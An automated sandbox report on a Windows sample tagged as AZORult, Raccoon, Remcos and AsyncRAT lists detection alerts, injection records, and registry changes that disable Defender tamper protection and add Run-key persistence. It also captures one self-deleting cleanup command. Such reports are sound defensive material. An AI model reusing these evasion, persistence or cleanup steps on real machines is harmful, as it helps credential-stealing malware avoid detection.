Malware Analysis Report

2024-09-22 21:55

Sample ID 210813-1qhgx2qah2
Target ED4D2E0F901BC478BE16D3DAD0D02792.exe
SHA256 959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Tags
asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e

Threat Level: Known bad

The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan

Azorult

Raccoon Stealer Payload

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Modifies Windows Defender Real-time Protection settings

Raccoon

Remcos

Contains code to disable Windows Defender

Oski

AsyncRat

Async RAT payload

Executes dropped EXE

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Deletes itself

Windows security modification

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: MapViewOfSection

Delays execution with timeout.exe

Checks processor information in registry

Suspicious use of WriteProcessMemory

Modifies system certificate store

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-13 11:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-13 11:33

Reported

2021-08-13 11:36

Platform

win7v20210408

Max time kernel

152s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [binary blob value not included in report] C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

"C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe"

C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe

"C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe"

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

"C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\458908152343698\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 756

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

"C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe"

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"

C:\Windows\SysWOW64\cmd.exe

